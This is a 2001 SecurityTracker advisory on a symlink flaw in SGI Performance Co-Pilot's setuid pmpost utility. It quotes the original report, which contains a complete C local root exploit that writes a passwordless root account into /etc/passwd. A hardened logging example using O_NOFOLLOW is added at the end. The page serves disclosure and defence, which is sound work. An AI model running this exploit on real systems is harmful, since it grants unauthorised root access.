Category:   Application (Generic)  >   Performance Co-Pilot (PCP)
Vendors:   SGI (Silicon Graphics)
SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
SecurityTracker Alert ID:  1001781
SecurityTracker URL:  http://securitytracker.com/id/1001781
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 19 2001
Impact:   Execution of arbitrary code via local system
Exploit Included:  Yes  

Description:   A vulnerability has been reported in SGI's Performance Co-Pilot (PCP) system management framework that allows local users to get root level privileges.

The vulnerability is reportedly a symlink handling problem in the pmpost utility, which is designed to manage text messages. The pmpost utility will reportedly follow symlinks. If the linked file is configured with setuid root privileges, this will allow a local user to obtain root level privileges.

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can obtain root level privileges on the host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  oss.sgi.com/projects/pcp/
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  tested on SuSE 7.1

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Information on Vulnerable SuSE Versions is Provided) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
The SuSE vendor indicates which SuSE distributions are affected and not affected.
(SGI Does Not Confirm But Provides Recommendations) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
SGI provides some configuration recommendations while they investigate the vulnerability report.
(Vendor Releases a Fix) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
The vendor has released a fix.
(CIAC Issues Advisory L-099) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
CIAC has issued advisory L-099.
(SGI Issues Fix for IRIX) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
SGI has issued a fix for IRIX.



 Source Message Contents

Subject:  pmpost - another nice symlink follower


Hi,

there is a symlink handling problem in the pcp suite from SGI. The
binary pmpost will follow symlinks, if setuid root this leads to instant
root compromise, as found on SuSE 7.1 (I doubt that this is a default SuSE
package, though).

Attached a simple C source to demonstrate this (gcc pm.c -o pm  then
./pm)



Ihq.



---------------------- pm.c ----------------------------

/********************************************************
 *                                                      *
 *              pmpost local root exploit               *
 *              vulnerable: pcp <= 2.1.11-5             *
 *              by IhaQueR                              *
 *                                                      *
 ********************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>

int main(void)
{
	const char *bin = "/usr/share/pcp/bin/pmpost";
	static char buf[512];
	static char dir[128];

	/* private scratch directory under /tmp */
	srand(time(NULL));
	sprintf(dir, "/tmp/dupa.%.8d", rand());

	if(mkdir(dir, S_IRWXU))
		_exit(2);

	if(chdir(dir))
		_exit(3);

	/* NOTICES in the scratch directory is a symlink to /etc/passwd */
	if(symlink("/etc/passwd", "./NOTICES"))
		_exit(4);

	/* point pmpost's log directory at the scratch directory */
	snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);

	if(putenv(buf))
		_exit(5);

	if(!fork()) {
		/* child: run the setuid pmpost; its message is written through the symlink */
		execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
		_exit(1);
	}
	else {
		/* parent: wait for pmpost, remove the scratch directory, then su */
		waitpid(0, NULL, WUNTRACED);
		chdir("..");
		sprintf(buf, "rm -rf dupa.*");
		system(buf);
		execl("/bin/su", "/bin/su", "r00t", NULL);
	}
	return 0;
}
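
Added example (not part of the advisory or the source message, and not PCP's own code): one way a privileged logger can refuse the planted symlink described above, by opening the log with O_NOFOLLOW and checking the opened descriptor rather than the name. The helper names, the 0644 mode and the /var/log/pcp default are assumptions; because O_NOFOLLOW covers only the final path component, the code also ignores PCP_LOG_DIR when running setuid or setgid.

```c
#define _XOPEN_SOURCE 700   /* expose O_NOFOLLOW under strict -std= modes */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define DEFAULT_LOG_DIR "/var/log/pcp"   /* assumed fixed path, not from the advisory */

/* Hypothetical helper: ignore PCP_LOG_DIR when running setuid/setgid. */
const char *notice_dir(void)
{
    const char *env = getenv("PCP_LOG_DIR");
    if (env == NULL || getuid() != geteuid() || getgid() != getegid())
        return DEFAULT_LOG_DIR;
    return env;
}

/* Hypothetical helper: append one line to <dir>/NOTICES.
 * Returns 0 on success, -1 if the write is refused or fails. */
int append_notice(const char *dir, const char *msg)
{
    char path[4096];
    struct stat st;
    size_t len = strlen(msg);
    int fd, ok;
    /* One call, one log line: reject empty text and embedded line breaks. */
    if (len == 0 || strpbrk(msg, "\r\n") != NULL)
        return -1;
    if ((size_t)snprintf(path, sizeof path, "%s/NOTICES", dir) >= sizeof path)
        return -1;
    /* O_NOFOLLOW: open() fails if the final path component is a symlink. */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    /* Inspect the opened object, not the name: regular file, single link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    ok = write(fd, msg, len) == (ssize_t)len && write(fd, "\n", 1) == 1;
    return (close(fd) == 0 && ok) ? 0 : -1;
}

int main(int argc, char **argv)
{
    return (argc == 2 && append_notice(notice_dir(), argv[1]) == 0) ? 0 : 1;
}
```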

 
 

